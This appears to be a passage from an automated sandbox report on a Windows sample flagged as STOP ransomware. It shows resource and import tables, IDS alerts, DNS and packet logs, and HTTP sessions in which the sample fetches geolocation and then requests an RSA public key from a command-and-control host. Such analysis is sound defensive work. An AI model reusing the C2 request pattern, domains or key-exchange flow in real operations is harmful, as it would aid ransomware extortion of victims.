          RT_ICON0xbe2200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6987704918032787
          RT_ICON0xbeba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.8200354609929078
          RT_ICON0xbf0880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3590085287846482
          RT_ICON0xbff300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5645306859205776
          RT_ICON0xc07d80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.618663594470046
          RT_ICON0xc0ea00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6748554913294798
          RT_ICON0xc14080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42821576763485475
          RT_ICON0xc39b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5315573770491804
          RT_ICON0xc43380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5124113475177305
          RT_ICON0xc48080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.2798507462686567
          RT_ICON0xc56b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.3664259927797834
          RT_ICON0xc5f580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.3738479262672811
          RT_ICON0xc66200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.3764450867052023
          RT_ICON0xc6b880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.25881742738589214
          RT_ICON0xc91300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.2727485928705441
          RT_ICON0xca1d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.2901639344262295
          RT_ICON0xcab600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.3262411347517731
          RT_STRING0xd0e680x19cdata0.49271844660194175
          RT_STRING0xd10080x3e4Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.4598393574297189
          RT_STRING0xd13f00x5ecdata0.433377308707124
          RT_STRING0xd19e00xc6data0.5858585858585859
          RT_STRING0xd1aa80x562data0.4455732946298984
          RT_STRING0xd20100x3c6data0.4699792960662526
          RT_GROUP_CURSOR0xcd7180x22data1.088235294117647
          RT_GROUP_CURSOR0xce5e80x14data1.25
          RT_GROUP_CURSOR0xd0cd80x22data1.088235294117647
          RT_GROUP_ICON0xc47a00x68dataTurkishTurkey0.7019230769230769
          RT_GROUP_ICON0xcafc80x76dataTurkishTurkey0.6694915254237288
          RT_GROUP_ICON0xbf0100x76dataTurkishTurkey0.6610169491525424
          RT_VERSION0xd0d000x168data0.6083333333333333
          DLLImport
          KERNEL32.dllGetComputerNameA, GetFullPathNameA, TryEnterCriticalSection, GetDefaultCommConfigW, InterlockedDecrement, GetNamedPipeHandleStateA, FindCloseChangeNotification, GetModuleHandleW, GetConsoleAliasesLengthA, FormatMessageA, ReadConsoleOutputA, GetDateFormatA, GetSystemTimes, LocalShrink, HeapDestroy, GlobalFlags, GetFileAttributesW, GetBinaryTypeA, GetStartupInfoW, RaiseException, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, FoldStringW, EnumDateFormatsA, lstrcatW, FreeEnvironmentStringsW, VirtualProtect, WaitForDebugEvent, FindAtomW, CloseHandle, DeleteAtom, GetConsoleSelectionInfo, HeapFree, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA
          USER32.dllLoadIconW
          Language of compilation systemCountry where language is spokenMap
          TurkishTurkey
          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
          2024-08-18T13:27:52.910290+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249711443192.168.2.6188.114.96.3
          2024-08-18T13:28:26.455747+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity14972480192.168.2.6109.175.29.39
          2024-08-18T13:28:05.846309+0200TCP2036335ET MALWARE Win32/Filecoder.STOP Variant Public Key Download18049719109.175.29.39192.168.2.6
          2024-08-18T13:28:21.259033+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249722443192.168.2.6188.114.96.3
          2024-08-18T13:28:17.138579+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249721443192.168.2.6188.114.96.3
          2024-08-18T13:28:26.499536+0200TCP2036335ET MALWARE Win32/Filecoder.STOP Variant Public Key Download18049724109.175.29.39192.168.2.6
          2024-08-18T13:28:05.845995+0200TCP2036334ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key14971980192.168.2.6109.175.29.39
          2024-08-18T13:28:02.381194+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249713443192.168.2.6188.114.96.3
          2024-08-18T13:28:25.517705+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249723443192.168.2.6188.114.96.3
          TimestampSource PortDest PortSource IPDest IP
          Aug 18, 2024 13:27:51.428845882 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:51.428899050 CEST44349711188.114.96.3192.168.2.6
          Aug 18, 2024 13:27:51.428999901 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:51.439946890 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:51.439961910 CEST44349711188.114.96.3192.168.2.6
          Aug 18, 2024 13:27:51.925798893 CEST44349711188.114.96.3192.168.2.6
          Aug 18, 2024 13:27:51.925873995 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:52.559731960 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:52.559777975 CEST44349711188.114.96.3192.168.2.6
          Aug 18, 2024 13:27:52.560106039 CEST44349711188.114.96.3192.168.2.6
          Aug 18, 2024 13:27:52.560184002 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:52.564029932 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:52.608503103 CEST44349711188.114.96.3192.168.2.6
          Aug 18, 2024 13:27:52.910283089 CEST44349711188.114.96.3192.168.2.6
          Aug 18, 2024 13:27:52.910402060 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:52.910414934 CEST44349711188.114.96.3192.168.2.6
          Aug 18, 2024 13:27:52.910461903 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:52.913691998 CEST49711443192.168.2.6188.114.96.3
          Aug 18, 2024 13:27:52.913711071 CEST44349711188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:01.504398108 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:01.504544020 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:01.504626036 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:01.513955116 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:01.513987064 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:01.999695063 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:01.999775887 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.005738020 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.005762100 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:02.005985022 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:02.006037951 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.008002996 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.048538923 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:02.381303072 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:02.381373882 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.381398916 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:02.381442070 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.381448030 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:02.381484985 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.381489992 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:02.381526947 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.381567955 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:02.381612062 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.382122993 CEST49713443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:02.382138968 CEST44349713188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:05.038374901 CEST4971980192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:05.043263912 CEST8049719109.175.29.39192.168.2.6
          Aug 18, 2024 13:28:05.043342113 CEST4971980192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:05.043502092 CEST4971980192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:05.048266888 CEST8049719109.175.29.39192.168.2.6
          Aug 18, 2024 13:28:05.845925093 CEST8049719109.175.29.39192.168.2.6
          Aug 18, 2024 13:28:05.845994949 CEST4971980192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:05.846132994 CEST4971980192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:05.846308947 CEST8049719109.175.29.39192.168.2.6
          Aug 18, 2024 13:28:05.846437931 CEST4971980192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:05.850994110 CEST8049719109.175.29.39192.168.2.6
          Aug 18, 2024 13:28:15.885006905 CEST49721443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:15.885061026 CEST44349721188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:15.885215998 CEST49721443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:15.905556917 CEST49721443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:15.905575037 CEST44349721188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:16.429039001 CEST44349721188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:16.429233074 CEST49721443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:16.788804054 CEST49721443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:16.788835049 CEST44349721188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:16.789186001 CEST44349721188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:16.789319992 CEST49721443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:16.790779114 CEST49721443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:16.836502075 CEST44349721188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:17.138581038 CEST44349721188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:17.138680935 CEST44349721188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:17.138955116 CEST49721443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:17.139513969 CEST49721443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:17.139537096 CEST44349721188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:20.233153105 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:20.233206034 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:20.233289957 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:20.391289949 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:20.391314030 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:20.887363911 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:20.887506962 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:20.899030924 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:20.899054050 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:20.899286985 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:20.899369955 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:20.904697895 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:20.952491045 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:21.259028912 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:21.259098053 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:21.259114981 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:21.259129047 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:21.259181023 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:21.283993006 CEST49722443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:21.284009933 CEST44349722188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:24.616008043 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:24.616079092 CEST44349723188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:24.616156101 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:24.635279894 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:24.635303974 CEST44349723188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:25.124033928 CEST44349723188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:25.124108076 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:25.127960920 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:25.127975941 CEST44349723188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:25.128251076 CEST44349723188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:25.128307104 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:25.129791021 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:25.176501036 CEST44349723188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:25.517695904 CEST44349723188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:25.517776012 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:25.517782927 CEST44349723188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:25.517868996 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:25.518445015 CEST49723443192.168.2.6188.114.96.3
          Aug 18, 2024 13:28:25.518491983 CEST44349723188.114.96.3192.168.2.6
          Aug 18, 2024 13:28:25.632184029 CEST4972480192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:25.637166023 CEST8049724109.175.29.39192.168.2.6
          Aug 18, 2024 13:28:25.637257099 CEST4972480192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:25.637597084 CEST4972480192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:25.642626047 CEST8049724109.175.29.39192.168.2.6
          Aug 18, 2024 13:28:26.455528975 CEST8049724109.175.29.39192.168.2.6
          Aug 18, 2024 13:28:26.455574989 CEST8049724109.175.29.39192.168.2.6
          Aug 18, 2024 13:28:26.455746889 CEST4972480192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:26.491991043 CEST4972480192.168.2.6109.175.29.39
          Aug 18, 2024 13:28:26.499536037 CEST8049724109.175.29.39192.168.2.6
          TimestampSource PortDest PortSource IPDest IP
          Aug 18, 2024 13:27:51.412672997 CEST5484753192.168.2.61.1.1.1
          Aug 18, 2024 13:27:51.423037052 CEST53548471.1.1.1192.168.2.6
          Aug 18, 2024 13:28:02.451071024 CEST5456053192.168.2.61.1.1.1
          Aug 18, 2024 13:28:03.437172890 CEST5456053192.168.2.61.1.1.1
          Aug 18, 2024 13:28:04.452807903 CEST5456053192.168.2.61.1.1.1
          Aug 18, 2024 13:28:05.037024975 CEST53545601.1.1.1192.168.2.6
          Aug 18, 2024 13:28:05.037067890 CEST53545601.1.1.1192.168.2.6
          Aug 18, 2024 13:28:05.037097931 CEST53545601.1.1.1192.168.2.6
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Aug 18, 2024 13:27:51.412672997 CEST192.168.2.61.1.1.10x1b66Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:02.451071024 CEST192.168.2.61.1.1.10xad57Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:03.437172890 CEST192.168.2.61.1.1.10xad57Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:04.452807903 CEST192.168.2.61.1.1.10xad57Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Aug 18, 2024 13:27:51.423037052 CEST1.1.1.1192.168.2.60x1b66No error (0)api.2ip.ua188.114.96.3A (IP address)IN (0x0001)false
          Aug 18, 2024 13:27:51.423037052 CEST1.1.1.1192.168.2.60x1b66No error (0)api.2ip.ua188.114.97.3A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com109.175.29.39A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com190.220.21.28A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com189.61.54.32A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com195.85.218.100A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com201.191.99.134A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com181.128.22.240A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com185.18.245.58A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com151.233.51.166A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com58.151.148.90A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037024975 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com212.112.110.243A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com109.175.29.39A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com190.220.21.28A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com189.61.54.32A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com195.85.218.100A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com201.191.99.134A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com181.128.22.240A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com185.18.245.58A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com151.233.51.166A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com58.151.148.90A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037067890 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com212.112.110.243A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com109.175.29.39A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com190.220.21.28A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com189.61.54.32A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com195.85.218.100A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com201.191.99.134A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com181.128.22.240A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com185.18.245.58A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com151.233.51.166A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com58.151.148.90A (IP address)IN (0x0001)false
          Aug 18, 2024 13:28:05.037097931 CEST1.1.1.1192.168.2.60xad57No error (0)cajgtus.com212.112.110.243A (IP address)IN (0x0001)false
          • api.2ip.ua
          • cajgtus.com
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.649719109.175.29.39806420C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          Aug 18, 2024 13:28:05.043502092 CEST139OUTGET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
          User-Agent: Microsoft Internet Explorer
          Host: cajgtus.com
          Aug 18, 2024 13:28:05.845925093 CEST762INHTTP/1.1 200 OK
          Date: Sun, 18 Aug 2024 11:28:17 GMT
          Server: Apache/2.4.37 (Win64) PHP/5.6.40
          X-Powered-By: PHP/5.6.40
          Content-Length: 558
          Connection: close
          Content-Type: text/html; charset=UTF-8
          Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 7a 7a 56 59 62 38 43 45 72 62 57 5c 2f 70 46 6b 68 4c 44 79 62 5c 5c 6e 39 49 4d 6e 4d 6a 5a 36 4c 58 7a 46 5a 38 56 45 4b 34 46 56 77 72 4b 4b 33 37 66 6d 65 71 69 6c 71 6f 34 33 66 6d 4c 50 49 47 2b 7a 67 36 41 54 70 5c 2f 31 2b 52 43 6a 57 79 42 6c 63 6d 67 52 66 5c 5c 6e 51 56 62 78 51 64 35 6b 67 6b 4a 4d 5c 2f 71 76 44 75 6f 5a 69 53 55 36 62 45 74 4f 32 47 75 6c 36 32 59 33 72 56 57 32 52 79 34 66 38 79 57 54 43 38 30 45 31 35 55 74 78 44 35 78 31 52 55 31 30 5c 5c 6e 4f 68 6a 56 4d 75 32 2b 6e 7a 76 46 34 42 42 69 54 47 4e 34 77 4f 52 2b 4b 45 62 6d 58 4a 4d 78 38 47 62 79 58 38 72 4b 70 53 56 4d 34 41 74 68 4f 44 68 66 31 4f 37 78 4f 38 4c 44 45 33 41 32 5c 5c 6e 4c 56 62 2b 66 67 58 74 6c 70 2b 4b 55 [TRUNCATED]
          Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrKK37fmeqilqo43fmLPIG+zg6ATp\/1+RCjWyBlcmgRf\\nQVbxQd5kgkJM\/qvDuoZiSU6bEtO2Gul62Y3rVW2Ry4f8yWTC80E15UtxD5x1RU10\\nOhjVMu2+nzvF4BBiTGN4wOR+KEbmXJMx8GbyX8rKpSVM4AthODhf1O7xO8LDE3A2\\nLVb+fgXtlp+KU7InK\/ykqgYGQJ7ot1T2xhbuiI2CypYEjUWj6ryIMBtYTR27kn1G\\nnslb1JL7NiXoCSEhbYxUqUv0hVuG1eZ7WqqGumf7CKjMJXZnLoyNBfWoli2qxuRX\\nfwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5"}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.649724109.175.29.39804856C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          TimestampBytes transferredDirectionData
          Aug 18, 2024 13:28:25.637597084 CEST128OUTGET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
          User-Agent: Microsoft Internet Explorer
          Host: cajgtus.com
          Aug 18, 2024 13:28:26.455528975 CEST762INHTTP/1.1 200 OK
          Date: Sun, 18 Aug 2024 11:28:38 GMT
          Server: Apache/2.4.37 (Win64) PHP/5.6.40
          X-Powered-By: PHP/5.6.40
          Content-Length: 558
          Connection: close
          Content-Type: text/html; charset=UTF-8
          Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 7a 7a 56 59 62 38 43 45 72 62 57 5c 2f 70 46 6b 68 4c 44 79 62 5c 5c 6e 39 49 4d 6e 4d 6a 5a 36 4c 58 7a 46 5a 38 56 45 4b 34 46 56 77 72 4b 4b 33 37 66 6d 65 71 69 6c 71 6f 34 33 66 6d 4c 50 49 47 2b 7a 67 36 41 54 70 5c 2f 31 2b 52 43 6a 57 79 42 6c 63 6d 67 52 66 5c 5c 6e 51 56 62 78 51 64 35 6b 67 6b 4a 4d 5c 2f 71 76 44 75 6f 5a 69 53 55 36 62 45 74 4f 32 47 75 6c 36 32 59 33 72 56 57 32 52 79 34 66 38 79 57 54 43 38 30 45 31 35 55 74 78 44 35 78 31 52 55 31 30 5c 5c 6e 4f 68 6a 56 4d 75 32 2b 6e 7a 76 46 34 42 42 69 54 47 4e 34 77 4f 52 2b 4b 45 62 6d 58 4a 4d 78 38 47 62 79 58 38 72 4b 70 53 56 4d 34 41 74 68 4f 44 68 66 31 4f 37 78 4f 38 4c 44 45 33 41 32 5c 5c 6e 4c 56 62 2b 66 67 58 74 6c 70 2b 4b 55 [TRUNCATED]
          Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrKK37fmeqilqo43fmLPIG+zg6ATp\/1+RCjWyBlcmgRf\\nQVbxQd5kgkJM\/qvDuoZiSU6bEtO2Gul62Y3rVW2Ry4f8yWTC80E15UtxD5x1RU10\\nOhjVMu2+nzvF4BBiTGN4wOR+KEbmXJMx8GbyX8rKpSVM4AthODhf1O7xO8LDE3A2\\nLVb+fgXtlp+KU7InK\/ykqgYGQJ7ot1T2xhbuiI2CypYEjUWj6ryIMBtYTR27kn1G\\nnslb1JL7NiXoCSEhbYxUqUv0hVuG1eZ7WqqGumf7CKjMJXZnLoyNBfWoli2qxuRX\\nfwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5"}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.649711188.114.96.34431208C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-18 11:27:52 UTC85OUTGET /geo.json HTTP/1.1
          User-Agent: Microsoft Internet Explorer
          Host: api.2ip.ua
          2024-08-18 11:27:52 UTC887INHTTP/1.1 200 OK
          Date: Sun, 18 Aug 2024 11:27:52 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          strict-transport-security: max-age=63072000; preload
          x-frame-options: SAMEORIGIN
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block; report=...
